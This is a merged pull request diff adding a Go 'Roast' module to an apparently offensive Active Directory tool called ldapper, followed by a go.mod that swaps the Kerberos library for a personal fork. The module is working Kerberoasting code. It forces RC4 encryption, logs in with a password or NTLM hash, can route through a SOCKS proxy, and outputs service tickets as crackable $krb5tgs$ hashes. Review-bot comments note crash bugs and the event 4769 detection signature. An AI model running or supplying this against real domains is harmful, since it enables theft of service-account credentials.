Merge pull request #5 from mfdooom/roast
Roast Module
Showing
5 changed files
with
153 additions
and
15 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,91 @@ | ||
package Commands | ||
|
||
import ( | ||
"fmt" | ||
"strings" | ||
"encoding/hex" | ||
"github.com/jcmturner/gokrb5/v8/config" | ||
"github.com/jcmturner/gokrb5/v8/client" | ||
"github.com/jcmturner/gokrb5/v8/iana/etypeID" | ||
"log" | ||
"os" | ||
) | ||
|
||
|
||
// dont really like this string for the config | ||
// would rather just create a new config and make changes via functions | ||
// would be easier to read | ||
// cant seem to figure out how to add a [realm] though | ||
const ( | ||
libdefault = `[libdefaults] | ||
default_realm = %s | ||
dns_lookup_realm = false | ||
dns_lookup_kdc = false | ||
ticket_lifetime = 24h | ||
renew_lifetime = 5 | ||
forwardable = yes | ||
proxiable = true | ||
default_tkt_enctypes = rc4-hmac | ||
default_tgs_enctypes = rc4-hmac | ||
noaddresses = true | ||
udp_preference_limit=1 | ||
[realms] | ||
%s = { | ||
kdc = %s:88 | ||
default_domain = %s | ||
}` | ||
) | ||
|
||
func RequestSPN(targetUser string, username string, password string, ntlm string, domain string, dc string, socksServer string, socksType int) (spnResult string) { | ||
|
||
var cl *client.Client | ||
var ticket string | ||
|
||
// Need domain in uppercase for GOKRB5 Config | ||
domain = strings.ToUpper(domain) | ||
|
||
l := log.New(os.Stderr, "GOKRB5 Client: ", log.Ldate|log.Ltime|log.Lshortfile) | ||
|
||
c, err := config.NewFromString(fmt.Sprintf(libdefault, domain, domain, dc, domain)) | ||
|
||
if err != nil { | ||
l.Fatalf("Error Loading Config: %v\n", err) | ||
} | ||
|
||
// Create a Kerberos client with either password or hash | ||
if password != ""{ | ||
cl = client.NewWithPassword(username, domain, password, c, client.DisablePAFXFAST(true), client.AssumePreAuthentication(false)) | ||
}else if ntlm != ""{ | ||
cl = client.NewWithHash(username, domain, ntlm, c, client.DisablePAFXFAST(true), client.AssumePreAuthentication(false)) | ||
} | ||
|
||
// Add socks info to client config if enabled | ||
if socksServer != "" { | ||
cl.Config.Socks.Enabled = true | ||
cl.Config.Socks.Version = socksType | ||
cl.Config.Socks.Server = socksServer | ||
} | ||
|
||
err = cl.Login() | ||
if err != nil { | ||
l.Fatalf("Erron on AS_REQ: %v\n", err) | ||
} | ||
|
||
tgt, _, err := cl.GetServiceTicket(targetUser) | ||
|
||
// only printing out RC4 encrypted tickets currently | ||
if err != nil { | ||
l.Printf("Error getting service ticket: %v\n", err) | ||
}else if tgt.EncPart.EType == etypeID.RC4_HMAC { | ||
checksumHex := make([]byte, hex.EncodedLen(len(tgt.EncPart.Cipher[:16]))) | ||
hex.Encode(checksumHex, tgt.EncPart.Cipher[:16]) | ||
|
||
cipherHex := make([]byte, hex.EncodedLen(len(tgt.EncPart.Cipher[16:]))) | ||
hex.Encode(cipherHex, tgt.EncPart.Cipher[16:]) | ||
ticket = fmt.Sprintf("$krb5tgs$%d$*%s$%s$%s*$%s$%s\n", tgt.EncPart.EType, tgt.SName.NameString[0], tgt.Realm, tgt.SName.NameString[0], checksumHex, cipherHex) | ||
}else if tgt.EncPart.EType != etypeID.RC4_HMAC { | ||
// Don't belive this would happen becuase we only offer rc4 encrpytion based on our config | ||
l.Printf("Invalid encryption type") | ||
} | ||
return ticket | ||
} |
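Review bot: `cl` is still nil when both `password` and `ntlm` are empty, so the SOCKS block or `cl.Login()` dereferences a nil pointer and panics; a guard such as `if cl == nil { l.Printf("no password or hash supplied"); return "" }` belongs right after the credential branch. `l.Fatalf` on the config and login errors exits the whole process from inside a command helper, where returning the empty result would leave that decision to the caller. `tgt.EncPart.Cipher[:16]` is also sliced with no length check, so a short cipher would panic too. On the detection side, the template pins `default_tgs_enctypes = rc4-hmac`, so these service-ticket requests should show up on the domain controller as event 4769 with ticket encryption type 0x17, which stands out in a domain where service accounts are AES-only.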
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
module ldapper | ||
|
||
require ( | ||
github.com/go-ldap/ldap/v3 v3.4.4 | ||
github.com/jcmturner/gokrb5/v8 v8.4.3 | ||
github.com/mazen160/go-random v0.0.0-20210308102632-d2b501c85c03 | ||
golang.org/x/text v0.3.7 | ||
h12.io/socks v1.0.3 | ||
) | ||
|
||
require ( | ||
github.com/Azure/go-ntlmssp v0.0.0-20220621081337-cb9428e4ac1e // indirect | ||
github.com/go-asn1-ber/asn1-ber v1.5.4 // indirect | ||
github.com/hashicorp/go-uuid v1.0.3 // indirect | ||
github.com/jcmturner/aescts/v2 v2.0.0 // indirect | ||
github.com/jcmturner/dnsutils/v2 v2.0.0 // indirect | ||
github.com/jcmturner/gofork v1.7.6 // indirect | ||
github.com/jcmturner/rpc/v2 v2.0.3 // indirect | ||
golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa // indirect | ||
golang.org/x/net v0.0.0-20220725212005-46097bf591d3 // indirect | ||
) | ||
|
||
replace github.com/jcmturner/gokrb5/v8 => github.com/mfdooom/gokrb5/v8 v8.4.3-0.20220811043259-08c37c0bdf17 |
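Review bot: The `replace` on the last line swaps the Kerberos library for a personal fork pinned at an untagged pseudo-version, and nothing in the file says why. A comment above it should name what the fork changes (presumably the SOCKS config fields and `NewWithHash` used by the new command; confirm against the fork) and which upstream release it branched from, so the delta can be audited and the override dropped later. The module also has no `go` directive, which leaves the language version to the toolchain default; add one matching the version the project is built with.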